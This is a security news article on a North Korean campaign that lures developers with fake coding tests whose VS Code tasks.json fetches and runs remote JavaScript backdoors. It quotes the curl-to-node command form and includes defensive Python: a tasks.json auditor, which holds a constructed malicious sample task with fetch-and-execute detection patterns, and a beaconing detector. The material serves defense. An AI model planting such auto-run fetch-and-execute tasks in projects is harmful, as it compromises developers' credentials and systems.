North Korea-Linked Hackers Target Developers via Malicious VS Code Projects
#Security


Security Reporter

A sophisticated cyber espionage campaign is using fake job assessments to trick developers into cloning malicious VS Code projects, delivering backdoors that can steal credentials, cryptocurrency, and source code.

North Korean threat actors have refined their tactics to target software developers through a seemingly legitimate job application process. The latest iteration of the "Contagious Interview" campaign involves luring developers with coding assessments that require cloning and opening malicious Visual Studio Code (VS Code) projects, ultimately delivering sophisticated backdoor malware.

The attack chain begins when a developer is approached, often via LinkedIn or other professional networks, by someone posing as a recruiter or technical lead. They share a repository link hosted on GitHub, GitLab, or Bitbucket, claiming it is part of a technical assessment. When the developer clones the repository, opens it in VS Code, and trusts the workspace, a task declared in the project's .vscode/tasks.json starts without any further interaction and executes the embedded malicious command.

How the VS Code Exploitation Works

The core of the attack abuses VS Code's task automation. A task entry in tasks.json carries "runOptions": { "runOn": "folderOpen" }, which tells VS Code to start that task as soon as the folder is opened. Automatic tasks do not run in Restricted Mode, so the trick depends on the developer accepting the Workspace Trust prompt, which a candidate expecting a real assessment will usually do. The task's command then fetches a JavaScript payload from a remote server and executes it.

On macOS the command takes the form nohup bash -c "curl -s <url> | node": curl -s fetches the script from a Vercel-hosted domain (ip-regions-check.vercel[.]app in the observed sample) and pipes it straight into the Node.js runtime, so nothing is written to disk. nohup keeps the process running after VS Code exits, and the -s flag suppresses curl's progress output so nothing appears in the task terminal.

The JavaScript payload establishes a persistent execution loop that harvests basic host information and communicates with a remote command-and-control (C2) server. In observed cases, the script beacons to the server every five seconds, ready to execute additional JavaScript instructions received from the operator. The malware can also erase traces of its activity upon receiving a specific signal.

Multi-Stage Payloads and Fallback Mechanisms

The campaign has evolved to include sophisticated multi-stage droppers. In some variants, threat actors conceal malicious code within what appears to be a harmless spell-check dictionary file. This serves as a fallback mechanism if the primary payload cannot be retrieved from the Vercel domain.

The final stage typically delivers either BeaverTail (a Node.js-based backdoor) or InvisibleFerret (a Python-based data stealer). BeaverTail focuses on establishing persistence, system fingerprinting, and remote code execution. InvisibleFerret extends the attack by:

  • Logging keystrokes
  • Taking screenshots
  • Scanning the home directory for sensitive files
  • Substituting wallet addresses in the clipboard
  • Extracting credentials from web browsers
  • Establishing persistent remote connections

In some cases, the attackers also deploy XMRig cryptocurrency miners or tools like AnyDesk for remote access.

AI-Assisted Malware Development

Security researchers have noted that the malware code shows signs of being AI-assisted. The JavaScript payload contains inline comments and phrasing that suggest the use of AI tools for code generation. This could enable the threat actors to rapidly iterate on their malware, changing delivery methods and payloads quickly to evade detection.

Jaron Bradley, director of Jamf Threat Labs, noted that "the payload we observed for macOS was written purely in JavaScript and had many signs of being AI assisted. It's difficult to know exactly how quickly attackers are changing their workflows, but this particular threat actor has a reputation for adapting quickly."

Why Developers Are Targeted

North Korean threat actors specifically target software engineers, particularly those working in cryptocurrency, blockchain, and fintech sectors. These professionals often have privileged access to financial assets, digital wallets, and critical technical infrastructure. Compromising their systems could provide unauthorized access to:

  • Source code and intellectual property
  • Internal systems and networks
  • Digital assets and cryptocurrency wallets
  • Sensitive corporate data

These capabilities align with the DPRK's broader cyber espionage and financial goals, supporting the heavily sanctioned regime through cryptocurrency theft and intellectual property acquisition.

Additional Attack Vectors

The campaign isn't limited to VS Code projects. Security researchers have identified multiple parallel delivery methods:

  1. Malicious npm packages: Attackers may instruct victims to install a malicious npm dependency named "grayavatar"
  2. Notion-based lures: Some attacks use Notion.so pages containing technical assessments with links to malicious repositories
  3. Multi-tool deployment: After initial compromise, the malware can deploy Python environments, cryptocurrency miners, keyloggers, and remote access tools

Defensive Recommendations

Developers and security teams should implement the following precautions:

For Individual Developers

  • Verify repository sources: Only clone repositories from trusted, verified sources. Be skeptical of unsolicited coding assessments
  • Review before opening: Inspect .vscode/tasks.json (and any other .vscode files) in a plain text editor before opening the project in VS Code. Any task with "runOn": "folderOpen", or any command that pipes curl or wget output into node, bash, or python, is a red flag
  • Check npm packages: Only install vetted npm packages from official registries
  • Use isolated environments: Consider using containerized or sandboxed environments for testing unknown code
  • Enable VS Code security settings: Keep Workspace Trust enabled (security.workspace.trust.enabled) and do not trust unsolicited repositories when prompted; set task.allowAutomaticTasks to "off" so folderOpen tasks never start on their own
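The "runOn": "folderOpen" mechanism described above and the "review before opening" recommendation can be handled with the same small pre-open check. The following script is an added example, not code from the Jamf Threat Labs report or from the campaign itself: it parses a cloned repository's .vscode/tasks.json and reports tasks that start on folder open, run in a hidden terminal, or contain fetch-and-execute idioms. The embedded tasks.json is constructed for illustration and uses the placeholder domain example.invalid; the regular expressions are heuristics, not a signature for the real payload.

```python
"""Audit a cloned repository's .vscode/tasks.json before opening it in VS Code.

Added example (not code from the Jamf Threat Labs report or the campaign).
The sample tasks.json below is constructed and uses a placeholder domain.
"""
import json
import re
import sys
from pathlib import Path

# Constructed sample mirroring the pattern described in the article: a task
# that runs on folder open, hides its terminal, and pipes a download into node.
SAMPLE_TASKS_JSON = r'''{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "setup",
      "type": "shell",
      "command": "nohup bash -c 'curl -s https://example.invalid/x.js | node' >/dev/null 2>&1 &",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    },
    {
      "label": "test",
      "type": "npm",
      "script": "test"
    }
  ]
}'''

# Fetch-and-execute idioms worth flagging whether or not a task auto-runs.
SUSPICIOUS_PATTERNS = [
    re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b.*\|\s*(node|bash|sh|python3?|powershell|pwsh)\b", re.I),
    re.compile(r"\bnohup\b"),
    re.compile(r"\b(base64\s+(-d|--decode)|FromBase64String)\b", re.I),
    re.compile(r"\b(node|python3?)\s+-e\b"),
]


def _strip_json_comments(text):
    """tasks.json is JSONC; drop block comments and full-line // comments
    (only lines that *start* with // so https:// in URLs is untouched)."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"^\s*//.*$", "", text, flags=re.M)


def _task_command(task):
    """Flatten command/script plus args; VS Code allows {value: ...} objects."""
    parts = []
    for key in ("command", "script"):
        v = task.get(key)
        if isinstance(v, str):
            parts.append(v)
        elif isinstance(v, dict) and isinstance(v.get("value"), str):
            parts.append(v["value"])
    for a in task.get("args") or []:
        if isinstance(a, str):
            parts.append(a)
        elif isinstance(a, dict) and isinstance(a.get("value"), str):
            parts.append(a["value"])
    return " ".join(parts)


def audit_tasks(text):
    """Return findings as (label, reason, flattened command) tuples."""
    data = json.loads(_strip_json_comments(text))
    findings = []
    for task in data.get("tasks", []):
        label = task.get("label", "<unlabeled>")
        cmd = _task_command(task)
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on == "folderOpen":
            findings.append((label, "runs automatically on folder open", cmd))
            if (task.get("presentation") or {}).get("reveal") == "never":
                findings.append((label, "hidden terminal (presentation.reveal=never)", cmd))
        for pat in SUSPICIOUS_PATTERNS:
            if pat.search(cmd):
                findings.append((label, f"matches fetch/execute idiom {pat.pattern!r}", cmd))
    return findings


def audit_repo(repo_dir):
    """Audit <repo>/.vscode/tasks.json; an empty list means nothing was found."""
    path = Path(repo_dir) / ".vscode" / "tasks.json"
    if not path.is_file():
        return []
    return audit_tasks(path.read_text(encoding="utf-8", errors="replace"))


if __name__ == "__main__":
    # Usage: python audit_tasks.py /path/to/cloned/repo  (no argument: sample)
    results = audit_repo(sys.argv[1]) if len(sys.argv) > 1 else audit_tasks(SAMPLE_TASKS_JSON)
    for label, reason, cmd in results:
        print(f"[!] task {label!r}: {reason}\n    {cmd}")
    sys.exit(1 if results else 0)
```

Run it against the clone before you open the folder in VS Code, not after; once the workspace has been trusted the folderOpen task has already fired. A non-zero exit makes it easy to wire into a wrapper script or pre-clone hook.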

For Organizations

  • Implement code review policies: Require security review for all external code repositories used in assessments
  • Monitor developer systems: Deploy endpoint detection and response (EDR) solutions that can detect unusual Node.js or Python activity
  • Network monitoring: Look for developer hosts connecting to unexpected *.vercel.app or other newly seen external hosts, and for short, fixed-interval beaconing from node or python processes spawned under a shell
  • Developer training: Educate developers about social engineering tactics and the risks of unsolicited coding tests
  • Supply chain security: Implement software composition analysis (SCA) tools to detect malicious dependencies
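The five-second check-in loop described earlier is the kind of behaviour the EDR and network monitoring recommendations above are meant to catch. The following detector is an added example, not part of the Jamf Threat Labs or OpenSourceMalware analysis: it groups outbound connection events by (process, destination) and flags groups whose inter-arrival times are short and nearly constant. The log lines are constructed, and the key=value fields (ts, proc, ppname, dst) are an assumed EDR-style export, not any vendor's real schema.

```python
"""Flag fixed-interval beaconing in process-network events.

Added example, not code from the Jamf Threat Labs or OpenSourceMalware
analysis. The log lines below are constructed; the field names are an
assumed EDR-style export.
"""
from collections import defaultdict
from datetime import datetime, timezone
from statistics import median, pstdev

# Constructed events: node (spawned by bash) contacts one host every 5 s,
# interleaved with an ordinary chat client whose timing is irregular.
SAMPLE_LOG = """\
ts=2025-02-03T09:00:00Z proc=node ppname=bash dst=203.0.113.7:443
ts=2025-02-03T09:00:01Z proc=Slack ppname=launchd dst=198.51.100.20:443
ts=2025-02-03T09:00:05Z proc=node ppname=bash dst=203.0.113.7:443
ts=2025-02-03T09:00:10Z proc=node ppname=bash dst=203.0.113.7:443
ts=2025-02-03T09:00:12Z proc=Slack ppname=launchd dst=198.51.100.20:443
ts=2025-02-03T09:00:15Z proc=node ppname=bash dst=203.0.113.7:443
ts=2025-02-03T09:00:20Z proc=node ppname=bash dst=203.0.113.7:443
ts=2025-02-03T09:00:25Z proc=node ppname=bash dst=203.0.113.7:443
ts=2025-02-03T09:00:30Z proc=node ppname=bash dst=203.0.113.7:443
ts=2025-02-03T09:00:41Z proc=Slack ppname=launchd dst=198.51.100.20:443
ts=2025-02-03T09:01:03Z proc=Slack ppname=launchd dst=198.51.100.20:443
ts=2025-02-03T09:01:09Z proc=Slack ppname=launchd dst=198.51.100.20:443
"""

# Interpreters that a tasks.json command would typically hand the payload to.
SCRIPT_RUNTIMES = {"node", "python", "python3"}
SHELLS = {"bash", "sh", "zsh"}


def parse_events(text):
    """Parse key=value lines into dicts; ts becomes an aware UTC datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(kv.split("=", 1) for kv in line.split())
        fields["ts"] = datetime.strptime(fields["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(fields)
    return events


def find_beacons(events, min_hits=5, max_jitter=0.2, max_period=60.0):
    """Group connections by (proc, dst) and report groups whose gaps are
    regular (pstdev/median <= max_jitter) and short (median <= max_period).

    Each hit records the period, the jitter, and whether the process was
    launched from a shell, which matches the bash -c ... | node chain.
    """
    groups = defaultdict(list)
    parents = defaultdict(set)
    for e in events:
        key = (e["proc"], e["dst"])
        groups[key].append(e["ts"])
        parents[key].add(e.get("ppname", ""))
    hits = []
    for (proc, dst), times in groups.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med = median(gaps)
        if med == 0 or med > max_period:
            continue
        jitter = pstdev(gaps) / med
        if jitter <= max_jitter:
            hits.append({
                "proc": proc,
                "dst": dst,
                "count": len(times),
                "period_s": round(med, 2),
                "jitter": round(jitter, 3),
                "shell_spawned_runtime": proc in SCRIPT_RUNTIMES and bool(parents[(proc, dst)] & SHELLS),
            })
    return sorted(hits, key=lambda h: h["dst"])


if __name__ == "__main__":
    for hit in find_beacons(parse_events(SAMPLE_LOG)):
        print(hit)
```

The thresholds are deliberately loose: a 20% jitter bound and a five-hit minimum will catch the five-second loop within half a minute while ignoring bursty but irregular traffic such as the chat client in the sample. In production, run it per host over a sliding window and treat shell_spawned_runtime as the strongest signal, since legitimate node services on a developer workstation are rarely children of an interactive bash.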

Broader Implications

This campaign highlights how state-sponsored actors are increasingly blending into legitimate developer workflows. By riding on trusted tools like VS Code and platforms like GitHub, they avoid the downloads, macros, and unsigned binaries that traditional security controls are tuned to flag.

The rapid evolution of these tactics—from simple repository lures to sophisticated multi-stage payloads with AI-assisted code generation—demonstrates the adaptive nature of advanced persistent threats (APTs). Security teams must stay informed about these evolving techniques and adjust their defenses accordingly.

For more detailed technical analysis, refer to the Jamf Threat Labs report and the OpenSourceMalware disclosure.
